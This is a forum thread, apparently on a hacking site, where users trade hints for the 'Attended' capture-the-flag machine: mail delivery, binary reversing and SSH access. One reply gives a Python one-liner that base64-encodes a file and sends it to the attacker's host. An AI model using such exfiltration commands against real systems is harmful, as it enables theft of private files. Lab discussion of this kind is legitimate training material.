TUTORIAL Attended User how to
by lingling40hrs - January 20, 2021 at 11:32 PM
#13
(February 01, 2021 at 02:14 PM)crankypuma Wrote: Anyone able to pwn it via authkeys bin ???

(January 23, 2021 at 11:16 AM)lingling40hrs Wrote: So, ppl who are struggling to get the mail from guly.

the mail is coming to freshness so make a new user in ur attackbox. then open the file /var/mail/freshness.

Like you can either make a new user or create a mail alias. But i did the former one, I did sudo adduser freshness and the mail started to come to /var/mail/freshness.

I understood that it is indeed coming to freshness by watching the logs at /var/log/mail.log and got the idea of creating an user.

It easier to use a 'python smptserver.py'

yes because of the fucking kali update my impacket got borked.
#14
(February 01, 2021 at 02:26 PM)lingling40hrs Wrote:
(February 01, 2021 at 02:14 PM)crankypuma Wrote: Anyone able to pwn it via authkeys bin ???

(January 23, 2021 at 11:16 AM)lingling40hrs Wrote: So, ppl who are struggling to get the mail from guly.

the mail is coming to freshness so make a new user in ur attackbox. then open the file /var/mail/freshness.

Like you can either make a new user or create a mail alias. But i did the former one, I did sudo adduser freshness and the mail started to come to /var/mail/freshness.

I understood that it is indeed coming to freshness by watching the logs at /var/log/mail.log and got the idea of creating an user.

It easier to use a 'python smptserver.py'

yes because of the fucking kali update my impacket got borked.

may I ask you to share a hint, I reversed the bin but I still miss the big picture behind this..
#15
need a bump for the ssh login to work.... help?
#16
anyone got root for this?
#17
(March 02, 2021 at 08:53 PM)lingling40hrs Wrote: anyone got root for this?
Yeah I managed to root it
#18
(January 20, 2021 at 11:32 PM)lingling40hrs Wrote: Disclaimer: beginers probably cannot do this even with the below walkthrough. Cause this is a summerized solution for who are close but not there yet.
[Hidden Content]

how did you extract the content of /home/guly/tmp/.config.swp file? I can't get cat to work in the script you provided
#19
(March 03, 2021 at 08:43 PM)osmanardanan Wrote:
(January 20, 2021 at 11:32 PM)lingling40hrs Wrote: Disclaimer: beginers probably cannot do this even with the below walkthrough. Cause this is a summerized solution for who are close but not there yet.
[Hidden Content]

how did you extract the content of /home/guly/tmp/.config.swp file? I can't get cat to work in the script you provided
python2 -c "import requests;requests.get('http://10.10.xx.xx/?y=$(cat file 2>&1 | openssl base64 -A)')"
#20
(March 03, 2021 at 06:17 AM)Iknowitsme Wrote:
(March 02, 2021 at 08:53 PM)lingling40hrs Wrote: anyone got root for this?
Yeah I managed to root it
Any walkthrough on the exploit code?
#21
(March 03, 2021 at 06:17 AM)Iknowitsme Wrote:
(March 02, 2021 at 08:53 PM)lingling40hrs Wrote: anyone got root for this?
Yeah I managed to root it

Some guide, for the exploitation of the binary ...
#22
bump for stoopied binary exploitation guide :c
#23
i do everything like you written. but i cant ssh into freshness.
#24
bump here. i done everything that written here, can ssh into freshness

Possibly Related Threads…
Thread Author Replies Views Last Post
FLAG Attended writeup & script paulwatson42016 35 4,564 May 08, 2021 at 03:09 PM
Last Post: robott
TUTORIAL ATTENDED [DISCUSSION] 0xvijay 91 26,870 May 08, 2021 at 07:26 AM
Last Post: Destroy3r3
FLAG Attended writeup xicla 7 1,600 May 01, 2021 at 05:34 PM
Last Post: im_RobOT

 Users browsing this thread: 1 Guest(s)